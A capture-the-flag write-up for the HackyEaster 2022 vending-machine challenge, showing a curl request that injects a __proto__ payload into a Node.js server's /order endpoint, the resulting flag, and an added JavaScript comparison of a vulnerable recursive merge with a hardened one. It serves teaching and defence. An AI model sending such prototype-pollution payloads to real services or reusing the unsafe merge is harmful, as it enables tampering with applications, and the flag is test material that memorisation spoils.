HackyEaster 2022 Writeup

自動販売機

Challenge

I like these Japanese vending machines! ๑(◕‿◕)๑

If I could just get a 🚩…

http://46.101.107.117:2210

Solution

Based on some chatter in Discord, we used the attack described here: https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution

$ curl --silent 'http://46.101.107.117:2210/order' -X POST -H 'Content-Type: application/json' --data-raw '{"__proto__": {"amount": 6, "item": "🚩"}}'
お楽しみください 🚩: he2022{p0llut10n_41nt_g00d}%
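To show why that body works against a Node.js handler and what the fix looks like, here is an added example (not the challenge's server code and not from the writeup): a naive recursive merge that copies the JSON body into an order object, beside a hardened merge that drops the `__proto__`, `constructor` and `prototype` keys. The handler shape and the helper names are assumptions; the payload is the one sent above.

```javascript
// Added example; the merge helpers and handler shape are assumptions, not the real server.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Vulnerable: copies every key. JSON.parse gives the body an own "__proto__" key, and
// target["__proto__"] on a plain object resolves to Object.prototype, so the recursion
// writes "amount" and "item" onto the prototype shared by every object in the process.
function mergeUnsafe(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value && typeof value === "object" && target[key] && typeof target[key] === "object") {
      mergeUnsafe(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: skips prototype-reaching keys and only recurses into the target's own objects.
function mergeSafe(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue; // or throw, to surface the attempt in logs
    const value = source[key];
    if (value && typeof value === "object" && !Array.isArray(value)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || !target[key] || typeof target[key] !== "object") {
        target[key] = {};
      }
      mergeSafe(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed request body: the same shape the writeup posts to /order.
const PAYLOAD = '{"__proto__": {"amount": 6, "item": "🚩"}}';

// Simulates the handler: merge the body into a fresh order, then read an unrelated
// object the request never touched. After a polluting merge that object "has" an
// amount and an item. Deletes the polluted keys afterwards so the check is repeatable.
function leakedIntoFreshObject(body, merge) {
  merge({}, JSON.parse(body));
  const untouched = {};
  const leaked = { amount: untouched.amount, item: untouched.item };
  delete Object.prototype.amount;
  delete Object.prototype.item;
  return leaked;
}
```

`leakedIntoFreshObject(PAYLOAD, mergeUnsafe)` reports `amount: 6, item: "🚩"` on an object the request never wrote to, while the same call with `mergeSafe` reports both as `undefined`.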

Flag

he2022{p0llut10n_41nt_g00d}